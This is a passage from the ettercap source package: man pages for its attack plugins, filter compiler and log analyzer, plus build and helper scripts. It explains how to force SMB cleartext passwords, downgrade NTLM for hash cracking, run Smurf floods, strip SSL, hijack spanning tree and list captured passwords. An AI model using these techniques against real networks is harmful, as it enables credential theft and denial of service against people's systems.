search_promisc // .TP .B smb_clear .Sp It forces the client to send smb password in clear-text by mangling protocol negotiation. You have to be in the "middle" of the connection to successfully use it. It hooks the smb dissector, so you have to keep it active. If you use it against a windows client it will probably result in a failure. Try it against a *nix smbclient :) .TP .B smb_down .Sp It forces the client to not to use NTLM2 password exchange during smb authentication. This way, obtained hashes can be easily cracked by LC4. You have to be in the "middle" of the connection to successfully use it. It hooks the smb dissector, so you have to keep it active. .TP .B smurf_attack .Sp The Smurf Attack is a DoS attack in which huge numbers of ICMP packets with the intended victim(s) IP(s) in target1 are sent to the hosts in target2. This causes all hosts on the target2 to reply to the ICMP request, causing significant traffic to the victim's computer(s). .Sp .I example (192.168.0.5 is the victim): .Sp ettercap \-i eth1 \-Tq /192.168.0.5/ // \-P fraggle_attack .TP .B sslstrip .Sp While performing the SSL mitm attack, ettercap substitutes the real ssl certificate with its own. The fake certificate is created on the fly and all the fields are filled according to the real cert presented by the server. Only the issuer is modified and signed with the private key contained in the 'etter.ssl.crt' file. If you want to use a different private key you have to regenerate this file. To regenerate the cert file use the following commands: openssl genrsa \-out etter.ssl.crt 1024 .br openssl req \-new \-key etter.ssl.crt \-out tmp.csr .br openssl x509 \-req \-days 1825 \-in tmp.csr \-signkey etter.ssl.crt \-out tmp.new .br cat tmp.new >> etter.ssl.crt .br rm \-f tmp.new tmp.csr NOTE: SSL mitm is not available (for now) in bridged mode. NOTE: You can use the \-\-certificate/\-\-private\-key long options if you want to specify a different file rather than the etter.ssl.crt file. .TP .B stp_mangler .Sp It sends spanning tree BPDUs pretending to be a switch with the highest priority. Once in the "root" of the spanning tree, ettercap can receive all the "unmanaged" network traffic. .br It is useful only against a group of switches running STP. .br If there is another switch with the highest priority, try to manually decrease your MAC address before running it. .Sp .I example : .Sp ettercap \-TP stp_mangler .SH ORIGINAL AUTHORS Alberto Ornaghi (ALoR) .br Marco Valleri (NaGA) .SH PROJECT STEWARDS Emilio Escobar (exfil) .br Eric Milam (Brav0Hax) .SH OFFICIAL DEVELOPERS Mike Ryan (justfalter) .br Gianfranco Costamagna (LocutusOfBorg) .br Antonio Collarino (sniper) .br Ryan Linn .br Jacob Baines .SH CONTRIBUTORS Dhiru Kholia (kholia) .br Alexander Koeppe (koeppea) .br Martin Bos (PureHate) .br Enrique Sanchez .br Gisle Vanem .br Johannes Bauer .br Daten (Bryan Schneiders) .SH "SEE ALSO" .I "ettercap(8)" .I "ettercap_curses(8)" .I "etterlog(8)" .I "etterfilter(8)" .I "etter.conf(5)" .I "ettercap\-pkexec(8)" .LP ettercap-0.8.3.1/man/etterfilter.8.in000664 000000 000000 00000033001 13711276346 017261 0ustar00rootroot000000 000000 .\" etterfilter -- filter compiler for ettercap filter files .\" .\" This program is free software; you can redistribute it and/or modify .\" it under the terms of the GNU General Public License as published by .\" the Free Software Foundation; either version 2 of the License, or .\" (at your option) any later version. .\" .\" This program is distributed in the hope that it will be useful, .\" but WITHOUT ANY WARRANTY; without even the implied warranty of .\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the .\" GNU General Public License for more details. .\" .\" You should have received a copy of the GNU General Public License .\" along with this program; if not, write to the Free Software .\" Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. .\" .\" .de Sp .if n .sp .if t .sp 0.4 .. .TH ETTERFILTER "8" "" "ettercap @VERSION@" .SH NAME etterfilter - Filter compiler for ettercap content filtering engine .SH SYNOPSIS .B etterfilter [\fIOPTIONS\fR] \fIFILE\fR .SH DESCRIPTION The etterfilter utility is used to compile source filter files into binary filter files that can be interpreted by the JIT interpreter in the ettercap(8) filter engine. You have to compile your filter scripts in order to use them in ettercap. All syntax/parse errors will be checked at compile time, so you will be sure to produce a correct binary filter for ettercap. .TP .B GENERAL OPTIONS .TP \fB\-o\fR, \fB\-\-output \fR you can specify the output file for a source filter file. By default the output is filter.ef. .TP \fB\-t\fR, \fB\-\-test \fR you can analyze a compiled filter file with this option. etterfilter will print in a human readable form all the instructions contained in it. It is a sort of "disassembler" for binary filter files. .TP \fB\-d\fR, \fB\-\-debug\fR prints some debug messages during the compilation. Use it more than once to increase the debug level ( etterfilter \-ddd ... ). .TP \fB\-w\fR, \fB\-\-suppress\-warnings\fR Don't exit on warnings. With this option the compiler will compile the script even if it contains warnings. .TP .B STANDARD OPTIONS .TP \fB\-v\fR, \fB\-\-version\fR Print the version and exit. .TP \fB\-h\fR, \fB\-\-help\fR prints the help screen with a short summary of the available options. .TP .B SCRIPTS SYNTAX A script is a compound of instructions. It is executed sequentially and you can make branches with the 'if' statements. 'if' and 'if/else' statements are the only supported. No loops are implemented. The syntax is almost like C code except that you have to put 'if' blocks into graph parentheses '{' '}', even if they contain only one instruction. .Sp NOTE: you have to put a space between the 'if' and the '('. You must not put the space between the function name and the '('. .Sp Example: .br if (conditions) { } .br func(args...); .Sp The conditions for an 'if' statement can be either functions or comparisons. Two or more conditions can be linked together with logical operators like OR '||' and AND '&&'. .Sp Example: .br if (tcp.src == 21 && search(DATA.data, "ettercap")) { .br } .Sp Pay attention to the operator precedence. You cannot use parentheses to group conditions, so be careful with the order. An AND at the beginning of a conditions block will exclude all the other tests if it is evaluated as false. The parsing is left-to-right, when an operator is found: if it is an AND and the previous condition is false, all the statement is evaluated as false; if it is an OR the parsing goes on even if the condition is false. .Sp Example: .br if (ip.proto == UDP || ip.proto == TCP && tcp.src == 80) { .br } .Sp if (ip.proto == TCP && tcp.src == 80 || ip.proto == UDP) { .br } .Sp the former condition will match all udp or http traffic. The latter is wrong, because if the packet is not tcp, the whole condition block will be evaluated as false. If you want to make complex conditions, the best way is to split them into nested 'if' blocks. .Sp Since etterfilter support both IP address families, you should care whether you use 'ip.proto' which is specific for the IPv4 address family or it's IPv6 couterpart 'ipv6.nh'. Especially for the L4 protocol matching using 'ip.proto' and/or 'ipv6.nh', you should be careful if you're really acting on the right protocol. This should be enforced using the L3 protocol identifier 'eth.proto'. .Sp Example: .br if (eth.proto == IP && ip.proto == TCP && tcp.dst == 80 || tcp.src == 80) { .br } .Sp if (eth.proto == IP6 && ipv6.nh == TCP && tcp.dst == 80 || tcp.src == 80) { .br } .Sp if (tcp.dst == 80 || tcp.src == 80) { .br } .Sp The first example correctly matches http traffic only on IPv4 while the second would match http traffic only on IPv6. The thrid example matches http regardless it's IP address familiy. .Sp Every instruction in a block must end with a semicolon ';'. .Sp Comparisons are implemented with the '==' operator and can be used to compare numbers, strings or ip addresses. An ip address MUST be enclosed within two single quotes (eg. '192.168.0.7' or '2001:db8::2'). You can also use the 'less than' ('<'), 'greater than' ('>'), 'less or equal' ('<=') and 'greater or equal' ('>=') operators. The lvalue of a comparison must be an offset (see later) .Sp Example: .br if (DATA.data + 20 == "ettercap" && ip.ttl > 16) { .br } .Sp Assignments are implemented with the '=' operator and the lvalue can be an offset (see later). The rvalue can be a string, an integer or a hexadecimal value. .Sp Example: .br ip.ttl = 0xff; .br DATA.data + 7 = "ettercap NG"; .Sp You can also use the 'inc' and 'dec' operations on the packet fields. The operators used are '+=' and '\-='. The rvalue can be an integer or a hexadecimal value. .Sp Example: .br ip.ttl += 5; More examples can be found in the etter.filter.examples file. .TP .B OFFSET DEFINITION An offset is identified by a virtual pointer. In short words, an offset is a pointer to the packet buffer. The virtual pointer is a tuple , where L is the iso/osi level, O is the offset in that level and S is the size of the virtual pointer. You can make algebraic operations on a virtual pointer and the result is still an offset. Specifying 'vp + n' will result in a new virtual pointer . And this is perfectly legal, we have changed the internal offset of that level. .Sp Virtual pointers are in the form 'name.field.subfield'. For example 'ip.ttl' is the virtual pointer for the Time To Live field in the IP header of a packet. It will be translated as . Indeed it is the 9th byte of level 3 and its size is 1 byte. 'ip.ttl + 1' is the same as 'ip.proto' since the 10th byte of the IP header is the protocol encapsulated in the IP packet. Note that since etterfilter also supports processing of IPv6, the above mentioned only applies for IPv4 packets while counterpart in IPv6 would be 'ipv6.nh'. .Sp The list of all supported virtual pointers is in the file etterfilter.tbl. You can add your own virtual pointers by adding a new table or modifying the existing ones. Refer to the comments at the beginning of the file for the syntax of etterfilter.tbl file. .TP .B SCRIPTS FUNCTIONS .TP .B search(\fIwhere\fR, \fIwhat\fR) this function searches the string 'what' in the buffer 'where'. The buffer can be either DATA.data or DECODED.data. The former is the payload at layer DATA (ontop TCP or UDP) as it is transmitted on the wire, the latter is the payload decoded/decrypted by dissectors. .br So, if you want to search in an SSH connection, it is better to use 'DECODED.data' since 'data' will be encrypted. .br The string 'what' can be binary. You have to escape it. .Sp example: .br search(DATA.data, "\\x41\\x42\\x43") .TP .B regex(\fIwhere\fR, \fIregex\fR) this function will return true if the 'regex' has matched the buffer 'where'. The considerations about 'DECODED.data' and 'DATA.data' mentioned for the function 'search' are the same for the regex function. .Sp NOTE: regex can be used only against a string buffer. .Sp example: .br regex(DECODED.data, ".*login.*") .TP .B pcre_regex(\fIwhere\fR, \fIpcre_regex\fR ... ) this function will evaluate a perl compatible regular expression. You can match against both DATA and DECODED, but if your expression modifies the buffer, it makes sense to operate only on DATA. The function accepts 2 or 3 parameters depending on the operation you want. The two parameter form is used only to match a pattern. The three parameter form means that you want to make a substitution. In both cases, the second parameter is the search string. .br You can use $n in the replacement string. These placeholders are referred to the groups created in the search string. (e.g. pcre_regex(DATA.data, "^var1=([:digit:]*)&var2=([:digit:]*)", "var1=$2&var2=$1") will swap the value of var1 and var2). .br NOTE: The pcre support is optional in ettercap and will be enabled only if you have the libpcre installed. The compiler will warn you if you try to compile a filter that contains pcre expressions but you don't have libpcre. Use the \-w option to suppress the warning. .Sp example: .br pcre_regex(DATA.data, ".*foo$") .br pcre_regex(DATA.data, "([^ ]*) bar ([^ ]*)", "foo $1 $2") .TP .B replace(\fIwhat\fR, \fIwith\fR) this function replaces the string 'what' with the string 'with'. They can be binary string and must be escaped. The replacement is always performed in DATA.data since is the only payload which gets forwarded. The 'DECODED.data' buffer is used only internally and never reaches the wire. .Sp example: .br replace("ethercap", "ettercap") .TP .B inject(\fIwhat\fR) this function injects the content of the file 'what' after the packet being processed. It always injects in DATA.data. You can use it to replace the entire packet with a fake one using the drop() function right before the inject() command. In that case the filtering engine will drop the current packet and inject the fake one. .Sp example: .br inject("./fake_packet") .TP .B log(\fIwhat\fR, \fIwhere\fR) this function dumps in the file 'where' the buffer 'what'. No information is stored about the packet, only the payload is dumped. So you will see the stream in the file. If you want to log packets in a more enhanced mode, you need to use the ettercap \-L option and analyze it with etterlog(8). .br The file 'where' must be writable to the user EC_UID (see etter.conf(5)). .Sp example: .br log(DECODED.data, "/tmp/interesting.log") .TP .B msg(\fImessage\fR) this function displays a message to the user in the User Messages window. It is useful to let the user know whether a particular filter has been successful or not. .Sp example: .br msg("Packet filtered successfully") .TP .B drop() this function marks the packet "to be dropped". The packet will not be forwarded to the real destination. .Sp example: .br drop() .TP .B kill() this function kills the connection that owns the matched packet. If it is a TCP connection, a RST is sent to both sides of the connection. If it is an UDP connection, an ICMP PORT UNREACHABLE is sent to the source of the packet. .Sp example: .br kill() .TP .B exec(\fIcommand\fR) this function executes a shell command. You have to provide the full path to the command since it is executed without any environment. There is no way to determine if the command was successful or not. Furthermore, it is executed asynchronously since it is forked by the main process. .Sp example: .br exec("/bin/cat /tmp/foo >> /tmp/bar") .TP .B execinject(\fIcommand\fR) this function operates similar to the \fBinject\fR function except that it uses the output of a shell command to inject data rather than the contents of a file. It always injects in DATA.data. You can use it to replace the entire packet with a fake one using the drop() function right before the execinject() command. In that case the filtering engine will drop the current packet and inject the fake one. .Sp example: .br execinject("/bin/cat /tmp/foo") .TP .B execreplace(\fIcommand\fR) this function operates similar to the \fBreplace\fR function except that it uses the output of a shell command to replace entire data rather than the contents of a file. An other difference, is that orinal packet content is pass to the shell command in stdin. It always injects in DATA.data. You can use it to replace the entire packet with a fake one depending on the original one. .Sp example: .br execreplace("tr A-Z a-z") .TP .B exit() this function causes the filter engine to stop executing the code. It is useful to stop the execution of the script on some circumstance checked by an 'if' statement. .Sp example: .br exit() .SH EXAMPLES Here are some examples of using etterfilter. .TP .B etterfilter filter.ecf \-o filter.ef .Sp Compiles the source filter.ecf into a binary filter.ef .SH ORIGINAL AUTHORS Alberto Ornaghi (ALoR) .br Marco Valleri (NaGA) .SH PROJECT STEWARDS Emilio Escobar (exfil) .br Eric Milam (Brav0Hax) .SH OFFICIAL DEVELOPERS Mike Ryan (justfalter) .br Gianfranco Costamagna (LocutusOfBorg) .br Antonio Collarino (sniper) .br Ryan Linn .br Jacob Baines .SH CONTRIBUTORS Dhiru Kholia (kholia) .br Alexander Koeppe (koeppea) .br Martin Bos (PureHate) .br Enrique Sanchez .br Gisle Vanem .br Johannes Bauer .br Daten (Bryan Schneiders) .SH "SEE ALSO" .I "etter.filter.examples" .br .I "ettercap(8)" .I "etterlog(8)" .I "etter.conf(5)" .I "ettercap_curses(8)" .I "ettercap_plugins(8)" .I "ettercap\-pkexec(8)" .LP ettercap-0.8.3.1/man/etterlog.8.in000664 000000 000000 00000025673 13711276346 016575 0ustar00rootroot000000 000000 .\" etterlog -- log analyzer for ettercap log files .\" .\" This program is free software; you can redistribute it and/or modify .\" it under the terms of the GNU General Public License as published by .\" the Free Software Foundation; either version 2 of the License, or .\" (at your option) any later version. .\" .\" This program is distributed in the hope that it will be useful, .\" but WITHOUT ANY WARRANTY; without even the implied warranty of .\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the .\" GNU General Public License for more details. .\" .\" You should have received a copy of the GNU General Public License .\" along with this program; if not, write to the Free Software .\" Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. .\" .\" .de Sp .if n .sp .if t .sp 0.4 .. .TH ETTERLOG "8" "" "ettercap @VERSION@" .SH NAME etterlog \- Log analyzer for ettercap log files .SH SYNOPSIS .B etterlog [\fIOPTIONS\fR] \fIFILE\fR .SH DESCRIPTION Etterlog is the log analyzer for logfiles created by ettercap. It can handle both compressed (created with \-Lc) or uncompressed logfiles. With this tool you can manipulate binary files as you like and you can print data in different ways all the times you want (in contrast with the previous logging system which was used to dump in a single static manner). .br You will be able to dump traffic from only one connection of your choice, from only one or more hosts, print data in hex, ascii, binary etc... .Sp TIP: All non-useful messages are printed to stderr, so you can save the output from etterlog with the following command: .TP \fIetterlog [options] logfile > outfile\fR .Sp Thus you can dump for example a binary file from an ftp connection if you print the data in binary mode, without headers and selecting only the ftp server as the source of the communication. .TP .B GENERAL OPTIONS .TP \fB\-a\fR, \fB\-\-analyze\fR Analyze a log file and display some interesting statistics. .TP \fB\-c\fR, \fB\-\-connections\fR Parse the log file and print a table of unique connections (port to port). This option can be used only on LOG_PACKET logfiles. On LOG_INFO logfiles it is useless. .Sp TIP: you can search for a particular host by using the following command: .Sp etterlog \-c logfile.ecp | grep 10.0.0.1 .TP \fB\-f\fR, \fB\-\-filter \fR Print only packets coming from or going to TARGET. The TARGET specification is the same as in ettercap. .br \fITARGET\fR is in the form \fIMAC/IPs/PORTs\fR. With IPv6 support enabled, \fITARGET\fR is in the form \fIMAC/IPs/IPv6/PORTs\fR. Omitting one or more of its parts will be equivalent to set them to ANY. IPs and IPv6 will be treated as one part so that it's only set to ANY if both IPs and IPv6 is omitted. This concludes in a result most users would expect. .Sp If the log type is LOG_INFO the target is used to display hosts matching the mac, ip and having the specified port(s) open. For example the target //80 will display only information about hosts with a running web server. .TP \fB\-r\fR, \fB\-\-reverse\fR Reverse the matching in the TARGET selection. It means not(TARGET). All but the selected TARGET. .TP \fB\-t\fR, \fB\-\-proto \fR Sniff only PROTO packets (default is TCP + UDP). This option is only useful in "simple" mode. If you start ettercap in interactive mode both TCP and UDP are sniffed. .br PROTO can be "tcp", "udp" or "all" for both. .TP \fB\-F\fR, \fB\-\-filcon \fR Print packets belonging only to this CONNECTION. .br CONNECTION is in the form PROTO:SOURCE:DEST. SOURCE and DEST are in the form IP:PORT. .Sp example: .Sp etterlog \-F TCP:10.0.0.23:3318:198.182.196.56:80 .TP \fB\-s\fR, \fB\-\-only\-source\fR Display only packets that are sent by the source of the selected CONNECTION. This option makes sense only in conjunction with the \-F option. .Sp TIP: if you want to save a file transferred in an HTTP or FTP connection, you can use the following command: .Sp etterlog \-B \-s \-n \-F TCP:10.0.0.1:20:10.0.0.2:35426 logfile.ecp > example.tar.gz .TP \fB\-d\fR, \fB\-\-only\-dest\fR Same as \-\-only\-source but it filters on the destination host. .TP \fB\-n\fR, \fB\-\-no\-headers\fR Do not print the header of each packet. This option is useful if you want to save a file in binary format (\-B option). Without the headers you can redirect the output to a file and you will get the original stream. .Sp NOTE: the time stamp in the header is in the form: Thu Mar 27 23:03:31 2003 [169396], the value in the square brackets is expressed in microseconds .TP \fB\-m\fR, \fB\-\-show\-mac\fR In the headers show also the mac addresses corresponding to the ip addresses. .TP \fB\-k\fR, \fB\-\-color\fR If used in conjunction with \-F it displays the source and dest of the connection using different colors. If used with a LOG_INFO file it prints LAN hosts in green, REMOTE hosts in blue and GATEWAYS in red. .TP \fB\-l\fR, \fB\-\-only\-local\fR Used displaying an INFO file, it displays information only about local hosts. .TP \fB\-L\fR, \fB\-\-only\-remote\fR Used displaying an INFO file, it displays information only about remote hosts. .TP .B SEARCH OPTIONS .TP \fB\-e\fR, \fB\-\-regex \fR Display only packets matching the regex . .br If this option is used against a LOG_PACKET logfile, the regex is executed on the payload of the packet. If the type is LOG_INFO, the regex is executed on all the fields of the host profile (OS, banners, service and ethernet adapter). .br NOTE: the regex is compiled with the REG_ICASE flag (case insensitive). .TP \fB\-u\fR, \fB\-\-user \fR Display information about this user. The search is performed over all the user/pass couples collected across all hosts. .TP \fB\-p\fR, \fB\-\-passwords\fR Print only the collected account information for each host. This prevents the huge profile output. It can be used in conjunction with the \-u option to filter the users. An asterisk '*' used in front of an account represents a failed login attempt. .TP \fB\-i\fR, \fB\-\-show\-client\fR Show the client ip address when displaying the collected users and passwords. It may be useful when ACLs are in place. .TP \fB\-I\fR, \fB\-\-client \fR Show passwords only coming from a specific . This is useful to view all the usernames and passwords of a client. .TP .B EDITING OPTIONS .TP \fB\-C\fR, \fB\-\-concat\fR Use this option to concatenate two (or more) files into one single file. This is useful if you have collected ettercap log files from multiple sources and want to have an unified report. The output file must be specified with the \-o option and the input files are listed as normal arguments. .Sp example: .br etterlog \-C \-o outfile input1 input2 input3 .TP \fB\-o\fR, \fB\-\-outfile \fR specifies the output file for a concatenation. .TP .B VISUALIZATION METHOD .TP \fB\-B\fR, \fB\-\-binary\fR Print data as they are, in binary form. Useful to dump binary data to a file (as described above). .TP \fB\-X\fR, \fB\-\-hex\fR Print the packets in hex format. .Sp example: .Sp the string "HTTP/1.1 304 Not Modified" becomes: .Sp 0000: 4854 5450 2f31 2e31 2033 3034 204e 6f74 HTTP/1.1 304 Not .br 0010: 204d 6f64 6966 6965 64 Modified .TP \fB\-A\fR, \fB\-\-ascii\fR Print only "printable" characters, the others are displayed as dots '.' .TP \fB\-T\fR, \fB\-\-text\fR Print only the "printable" characters and skip the others. .TP \fB\-E\fR, \fB\-\-ebcdic\fR Convert an EBCDIC text to ASCII. .TP \fB\-H\fR, \fB\-\-html\fR Strip all html tags from the text. A tag is every string between '<' and '>'. .Sp example: .Sp This is the title, but the following will not be displayed. .Sp This is the title, but the following will not be displayed. .TP \fB\-U\fR, \fB\-\-utf8 \fR Print the packets in UTF-8 format. The parameter specifies the encoding to be used while performing the conversion. Use the `iconv \-\-list` command to obtain a list of all supported encodings. .TP \fB\-Z\fR, \fB\-\-zero\fR Print always the void string. i.e. print only header information and no packet content will be printed. .TP \fB\-x\fR, \fB\-\-xml\fR Print the host information in xml form, so you can parse it with your favourite program. .Sp The DTD associated with the xml output is in share/etterlog.dtd .TP .B STANDARD OPTIONS .TP \fB\-v\fR, \fB\-\-version\fR Print the version and exit. .TP \fB\-h\fR, \fB\-\-help\fR Print the help screen with a short summary of the available options. .SH EXAMPLES Here are some examples of using etterlog. .TP .B etterlog \-k \-l dump.eci .Sp Displays information about local hosts in different colors. .TP .B etterlog \-X dump.ecp .Sp Prints packets in HEX mode with full headers. .TP .B etterlog \-c dump.ecp .Sp Displays the list of connections logged in the file. .TP .B etterlog \-Akn \-F TCP:10.0.0.1:13423:213.203.143.52:6666 dump.ecp .Sp Displays the IRC traffic made by 10.0.0.1 in ASCII mode, without headers information and in colored mode. .TP .B etterlog \-H \-t tcp \-f //80 dump.ecp .Sp Dumps all HTTP traffic and strips html tags. .TP .B etterlog \-Z \-r \-f /10.0.0.2/22 dump.ecp .Sp Displays only the headers of all connections except ssh on host 10.0.0.2 .TP .B etterlog \-A \-e 'user' \-f //110 dump.ecp .Sp Displays only POP packets containing the 'user' regexp (case insensitive). .TP .B etterlog \-u root dump.eci .Sp Displays information about all the accounts of the user 'root'. .TP .B etterlog \-e Apache dump.eci .Sp Displays information about all the hosts running 'Apache'. .TP .B etterlog \-e Linux dump.eci .Sp Displays information about all the hosts with the 'Linux' operating system. .TP .B etterlog \-t tcp \-f //110 dump.eci .Sp Displays information about all the hosts with the tcp port 110 open. .TP .B etterlog \-t udp dump.eci .Sp Displays information about all the hosts with at least one UDP port open. .TP .B etterlog \-B \-s \-n \-F TCP:10.0.0.1:20:10.0.0.2:35426 logfile.ecp > example.tar.gz .Sp Dumps in binary form the data sent by 10.0.0.1 over the data port of FTP. Since the headers are omitted, you will get the file as it was. .SH ORIGINAL AUTHORS Alberto Ornaghi (ALoR) .br Marco Valleri (NaGA) .SH PROJECT STEWARDS Emilio Escobar (exfil) .br Eric Milam (Brav0Hax) .SH OFFICIAL DEVELOPERS Mike Ryan (justfalter) .br Gianfranco Costamagna (LocutusOfBorg) .br Antonio Collarino (sniper) .br Ryan Linn .br Jacob Baines .SH CONTRIBUTORS Dhiru Kholia (kholia) .br Alexander Koeppe (koeppea) .br Martin Bos (PureHate) .br Enrique Sanchez .br Gisle Vanem .br Johannes Bauer .br Daten (Bryan Schneiders) .SH "SEE ALSO" .I "ettercap(8)" .I "etterfilter(8)" .I "etter.conf(5)" .I "ettercap_curses(8)" .I "ettercap_plugins(8)" .I "ettercap\-pkexec(8)" .LP ettercap-0.8.3.1/misc/000775 000000 000000 00000000000 13711276346 014415 5ustar00rootroot000000 000000 ettercap-0.8.3.1/misc/cmakelint.sh000775 000000 000000 00000003315 13711276346 016725 0ustar00rootroot000000 000000 #!/bin/sh # set -xe # cmakelint.sh -- report style/format issues in CMake files. # (C) 2018 Ettercap Development Team. # cmake-lint is a Python tool that checks and reports coding/style issues in # CMake related build scripts. # # Installation: # https://github.com/richq/cmake-lint # The recommended version is 1.4, which, at the time of this writing, was not yet # published on PyPI. # # Ettercap uses cmake-lint and this shell script to enforce its consistent, # portable and up-to-date cmake coding practices. This means that all cmake files # *contributed* to the project will undergo a series of checks before the build # configuration phase can begin. # # If this script finds any issues, it will exit with a non-zero status and a # detailed error message. Else it won't output anything and exits with status # code 0. # # Additional information, including on how to use this script as pre-commit # hook, see Ettercap's Wiki (Etterwiki) at: # https://github.com/Ettercap/ettercap/wiki # # TODO: # 1. Enforce maximum line length of 80 characters (requires cmake version >= 3) # 2. Fix (variables passed to std args in) FindGTK3.cmake # 3. Move the description about this script to Etterwiki [ -f cmakelint.sh ] && ECROOT=.. || ECROOT=. FILTERS=\ -linelength,\ -package/stdargs,\ +convention/filename,\ +package/consistency,\ +readability/logic,\ +readability/mixedcase,\ +readability/wonkycase,\ +syntax,\ +whitespace/eol,\ +whitespace/extra,\ +whitespace/indent,\ +whitespace/mismatch,\ +whitespace/newline,\ +whitespace/tabs CMAKELINT="cmakelint --filter=$FILTERS --quiet --spaces=2" FIND="$(find $ECROOT \ -name CMakeLists.txt -not -path "$ECROOT/build*/*" -or \ -name *.cmake -not -path "$ECROOT/build*/*")" $CMAKELINT $FINDettercap-0.8.3.1/misc/geolite-update.sh000664 000000 000000 00000004522 13711276346 017664 0ustar00rootroot000000 000000 #!/bin/sh # set -xe # geolite-update.sh -- update GeoIP lite databases. # (C) 2017-2019 Ettercap Development Team. # Ettercap can use MaxMind's GeoIP databases to look up the country for an IP address. # This simple shell script helps in downloading and installing the *free* GeoLite # country databases, which are needed for this feature to actually work. # You can optionally pass an alternative install path to this script. # If you rather not, it will install all files to /usr/local/share/GeoIP/. # Note: In some distributions/operating systems these databases are available # through their package manager. # You most likely don't need to use this script if this is the case. USAGE="USAGE: $(basename $0) [geolite install path]" # check argument count if [ $# -gt 1 ] then echo $USAGE exit fi if [ -z $1 ] then geolite_path="/usr/share/GeoIP" download_path="/usr/share/GeoIP/download" else geolite_path=$1 download_path="$1/download" fi # prg="curl --remote-name" prg="wget --continue --directory-prefix=$download_path" if [ ! -e $geolite_path ]; then echo "Unable to find GeoIP directory: $geolite_path" exit 1 fi echo "Updating/Installing GeoLite databases..." echo "Note: Not installing GeoLiteCity database (not used by Ettercap)" [ -d $download_path ] || mkdir $download_path $prg http://geolite.maxmind.com/download/geoip/database/GeoLiteCountry/GeoIP.dat.gz if [ ! -e $download_path/GeoIP.dat.gz ]; then echo "Unable to find GeoIP.dat.gz!" exit 1 fi gunzip -c $download_path/GeoIP.dat.gz > $geolite_path/GeoIP.dat rm -f $download_path/GeoIP.dat.gz # Ettercap doesn't use the GeoLiteCity database... yet. # Uncomment the following lines if you want to download and install it anyways. # $prg http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz # if [ ! -e $download_path/GeoLiteCity.dat.gz ]; then # echo "Unable to find GeoLiteCity.dat.gz!" # exit 1 # fi # gunzip -c $download_path/GeoLiteCity.dat.gz > $geolite_path/GeoLiteCity.dat # rm -f $download_path/GeoLiteCity.dat.gz $prg http://geolite.maxmind.com/download/geoip/database/GeoIPv6.dat.gz if [ ! -e $download_path/GeoIPv6.dat.gz ]; then echo "Unable to find GeoIPv6.dat.gz!" exit 1 fi gunzip -c $download_path/GeoIPv6.dat.gz > $geolite_path/GeoIPv6.dat rm -f $download_path/GeoIPv6.dat.gz echo "Done." ettercap-0.8.3.1/misc/get-mac.sh000775 000000 000000 00000001207 13711276346 016271 0ustar00rootroot000000 000000 #!/bin/sh #set -xe [ -f get-mac.sh ] && SHARE=../share || SHARE=share # set the relative path to ettercap's "share" directory wget http://standards.ieee.org/develop/regauth/oui/oui.txt cat oui.txt |grep "base 16" > oui #clean unused lines sed 's/\ \ \ \ \ (base\ 16)\t\t/ /g' -i oui #remove spaces sed 's/\ \ //g' -i oui #remove initial stuff sed '/^[0-9A-F]*$/d' -i oui #remove some private lines mv oui etter.finger.mac rm oui.txt echo "the maximum line SHOULD be less than 120 bytes (ec_manuf.c manuf_init function)" echo "maximum line of the newly generated file" wc -L etter.finger.mac dos2unix etter.finger.mac mv etter.finger.mac $SHARE ettercap-0.8.3.1/plug-ins/000775 000000 000000 00000000000 13711276346 015220 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/CMakeLists.txt000664 000000 000000 00000003341 13711276346 017761 0ustar00rootroot000000 000000 if(HAVE_PCRE) if(CURL_FOUND) add_library(sslstrip MODULE sslstrip/sslstrip.c) include_directories(${CURL_INCLUDE_DIR} ${PCRE_INCLUDE_DIR}) add_dependencies(sslstrip curl) target_link_libraries(sslstrip ${CURL_LIBRARY} ${PCRE_LIBRARY}) target_link_libraries(sslstrip lib_ettercap) set_target_properties(sslstrip PROPERTIES PREFIX "ec_") install(TARGETS sslstrip LIBRARY DESTINATION ${INSTALL_LIBDIR}/ettercap/ PERMISSIONS OWNER_READ OWNER_WRITE OWNER_EXECUTE GROUP_READ GROUP_EXECUTE WORLD_READ WORLD_EXECUTE) else() message(STATUS "Not building sslstrip plugin. Requires libcurl.") endif() else() message(STATUS "Not building sslstrip plugin. Requires pcre.") endif() set(PLUGINS arp_cop autoadd chk_poison dns_spoof mdns_spoof dos_attack dummy find_conn find_ettercap find_ip finger finger_submit fraggle_attack gre_relay gw_discover isolate link_type nbns_spoof pptp_chapms1 pptp_clear pptp_pap pptp_reneg rand_flood remote_browser reply_arp repoison_arp scan_poisoner search_promisc smb_clear smb_down krb5_downgrade smurf_attack stp_mangler) foreach(plugin ${PLUGINS}) add_library(${plugin} MODULE ${plugin}/${plugin}.c) set_target_properties(${plugin} PROPERTIES PREFIX "ec_") target_link_libraries(${plugin} lib_ettercap) install(TARGETS ${plugin} LIBRARY DESTINATION ${INSTALL_LIBDIR}/ettercap/ PERMISSIONS OWNER_READ OWNER_WRITE OWNER_EXECUTE GROUP_READ GROUP_EXECUTE WORLD_READ WORLD_EXECUTE) endforeach() if(NOT HAVE_DN_EXPAND) target_link_libraries(dns_spoof ${HAVE_RESOLV}) target_link_libraries(mdns_spoof ${HAVE_RESOLV}) endif() target_link_libraries(dos_attack ${HAVE_LIBNET}) ettercap-0.8.3.1/plug-ins/arp_cop/000775 000000 000000 00000000000 13711276346 016643 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/arp_cop/arp_cop.c000664 000000 000000 00000014067 13711276346 020442 0ustar00rootroot000000 000000 /* arp_cop -- ettercap plugin -- Report suspicious ARP activity Copyright (C) ALoR & NaGA Copyright (C) 2001 for the original plugin : Paulo Madeira This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include /* protos */ int plugin_load(void *); static int arp_cop_init(void *); static int arp_cop_fini(void *); static void parse_arp(struct packet_object *po); static 